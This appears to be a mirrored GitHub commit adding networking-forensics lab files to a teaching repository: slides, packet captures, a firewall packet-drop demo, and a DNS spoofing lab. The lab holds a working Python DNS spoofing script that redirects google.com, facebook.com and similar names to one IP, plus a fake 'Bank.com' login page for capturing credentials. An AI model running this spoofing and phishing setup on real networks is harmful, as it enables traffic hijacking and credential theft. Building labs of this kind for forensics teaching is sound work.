mirror of
https://github.com/frankwxu/digital-forensics-lab.git
synced 2026-02-20 13:40:40 +00:00
add networking forensics draft. incompleted!
This commit is contained in:
Binary file not shown.
BIN
Networking_Forensics/50_Firewall_Drop.pptx
Normal file
BIN
Networking_Forensics/50_Firewall_Drop.pptx
Normal file
Binary file not shown.
BIN
Networking_Forensics/70_DNS.pptx
Normal file
BIN
Networking_Forensics/70_DNS.pptx
Normal file
Binary file not shown.
BIN
Networking_Forensics/80_DNS_Spoof_Forensics.pptx
Normal file
BIN
Networking_Forensics/80_DNS_Spoof_Forensics.pptx
Normal file
Binary file not shown.
BIN
Networking_Forensics/lab_files/dns/dig_dns.pcap
Normal file
BIN
Networking_Forensics/lab_files/dns/dig_dns.pcap
Normal file
Binary file not shown.
BIN
Networking_Forensics/lab_files/dns/http_dns.pcap
Normal file
BIN
Networking_Forensics/lab_files/dns/http_dns.pcap
Normal file
Binary file not shown.
BIN
Networking_Forensics/lab_files/dns/http_ub_dns.pcap
Normal file
BIN
Networking_Forensics/lab_files/dns/http_ub_dns.pcap
Normal file
Binary file not shown.
64
Networking_Forensics/lab_files/dns_spoof/dns_spoof.py
Normal file
64
Networking_Forensics/lab_files/dns_spoof/dns_spoof.py
Normal file
@@ -0,0 +1,64 @@
|
||||
# https://www.geeksforgeeks.org/how-to-make-a-dns-spoof-attack-using-scapy-in-python/
|
||||
# https://www.thepythoncode.com/article/make-dns-spoof-python
|
||||
import os
|
||||
import logging as log
|
||||
from scapy.all import IP, DNSRR, DNS, UDP, DNSQR
|
||||
from netfilterqueue import NetfilterQueue
|
||||
|
||||
|
||||
class DnsSnoof:
|
||||
def __init__(self, hostDict, queueNum):
|
||||
self.hostDict = hostDict
|
||||
self.queueNum = queueNum
|
||||
self.queue = NetfilterQueue()
|
||||
|
||||
def __call__(self):
|
||||
log.info("Snoofing....")
|
||||
os.system(
|
||||
f'iptables -I FORWARD -j NFQUEUE --queue-num {self.queueNum}')
|
||||
self.queue.bind(self.queueNum, self.callBack)
|
||||
try:
|
||||
self.queue.run()
|
||||
except KeyboardInterrupt:
|
||||
os.system(
|
||||
f'iptables -D FORWARD -j NFQUEUE --queue-num {self.queueNum}')
|
||||
log.info("[!] iptable rule flushed")
|
||||
|
||||
def callBack(self, packet):
|
||||
scapyPacket = IP(packet.get_payload())
|
||||
if scapyPacket.haslayer(DNSRR):
|
||||
try:
|
||||
log.info(f'[original] { scapyPacket[DNSRR].summary()}')
|
||||
queryName = scapyPacket[DNSQR].qname
|
||||
if queryName in self.hostDict:
|
||||
scapyPacket[DNS].an = DNSRR(
|
||||
rrname=queryName, rdata=self.hostDict[queryName])
|
||||
scapyPacket[DNS].ancount = 1
|
||||
del scapyPacket[IP].len
|
||||
del scapyPacket[IP].chksum
|
||||
del scapyPacket[UDP].len
|
||||
del scapyPacket[UDP].chksum
|
||||
log.info(f'[modified] {scapyPacket[DNSRR].summary()}')
|
||||
else:
|
||||
log.info(f'[not modified] { scapyPacket[DNSRR].rdata }')
|
||||
except IndexError as error:
|
||||
log.error(error)
|
||||
packet.set_payload(bytes(scapyPacket))
|
||||
return packet.accept()
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
try:
|
||||
hostDict = {
|
||||
b"google.com.": "136.160.215.15",
|
||||
b"facebook.com.": "136.160.215.15",
|
||||
b"ubalt.com.": "136.160.215.15",
|
||||
b"g00gle.com.": "136.160.215.15",
|
||||
}
|
||||
queueNum = 1
|
||||
log.basicConfig(format='%(asctime)s - %(message)s',
|
||||
level = log.INFO)
|
||||
snoof = DnsSnoof(hostDict, queueNum)
|
||||
snoof()
|
||||
except OSError as error:
|
||||
log.error(error)
|
||||
21
Networking_Forensics/lab_files/dns_spoof/index.html
Normal file
21
Networking_Forensics/lab_files/dns_spoof/index.html
Normal file
@@ -0,0 +1,21 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<title>Bank.com Login</title>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<h1>Bank.com Login</h1>
|
||||
<form action="#" method="post">
|
||||
<label for="username">Username:</label>
|
||||
<input type="text" id="username" name="username" required><br><br>
|
||||
|
||||
<label for="password">Password:</label>
|
||||
<input type="password" id="password" name="password" required><br><br>
|
||||
|
||||
<input type="submit" value="Login">
|
||||
</form>
|
||||
</body>
|
||||
|
||||
</html>
|
||||
13
Networking_Forensics/lab_files/firewall/hello.html
Normal file
13
Networking_Forensics/lab_files/firewall/hello.html
Normal file
@@ -0,0 +1,13 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<title>Hello World</title>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<h1>Hello World! Network Forensics. </h1>
|
||||
<p>Welcome to my simple web page.</p>
|
||||
</body>
|
||||
|
||||
</html>
|
||||
@@ -0,0 +1,61 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
import argparse
|
||||
import os
|
||||
import signal
|
||||
import sys
|
||||
|
||||
from netfilterqueue import NetfilterQueue
|
||||
from scapy.layers.inet import IP
|
||||
from scapy.sendrecv import send
|
||||
|
||||
|
||||
def iptables_add_rule(ip_address):
|
||||
os.system(f"iptables -A INPUT -s {ip_address} -j NFQUEUE --queue-num 1")
|
||||
|
||||
|
||||
def iptables_remove_rule(ip_address):
|
||||
os.system(f"iptables -D INPUT -s {ip_address} -j NFQUEUE --queue-num 1")
|
||||
|
||||
|
||||
def handle_packet(packet):
|
||||
ip = IP(packet.get_payload())
|
||||
source_ip = ip.src
|
||||
print(f"Receiving packet from {source_ip}")
|
||||
|
||||
if source_ip == args.source_ip:
|
||||
print(f"Dropping packet from {source_ip}")
|
||||
packet.drop()
|
||||
print("================================")
|
||||
|
||||
def parse_arguments():
|
||||
parser = argparse.ArgumentParser(description="Python script to demonstrate iptables functions")
|
||||
parser.add_argument("source_ip", help="Source IP address to filter")
|
||||
return parser.parse_args()
|
||||
|
||||
|
||||
def main():
|
||||
if os.geteuid() != 0:
|
||||
print("You must be root to run this script.")
|
||||
sys.exit(1)
|
||||
|
||||
global args
|
||||
args = parse_arguments()
|
||||
|
||||
iptables_add_rule(args.source_ip)
|
||||
|
||||
q = NetfilterQueue()
|
||||
q.bind(1, handle_packet)
|
||||
|
||||
try:
|
||||
print("Waiting incoming packets...")
|
||||
q.run()
|
||||
except KeyboardInterrupt:
|
||||
print("Exiting...")
|
||||
q.unbind()
|
||||
iptables_remove_rule(args.source_ip)
|
||||
print("Rules are removed...")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
13
Networking_Forensics/lab_files/firewall_forward/hello.html
Normal file
13
Networking_Forensics/lab_files/firewall_forward/hello.html
Normal file
@@ -0,0 +1,13 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<title>Hello World</title>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<h1>Hello World! Network Forensics. </h1>
|
||||
<p>Welcome to my simple web page.</p>
|
||||
</body>
|
||||
|
||||
</html>
|
||||
Reference in New Issue
Block a user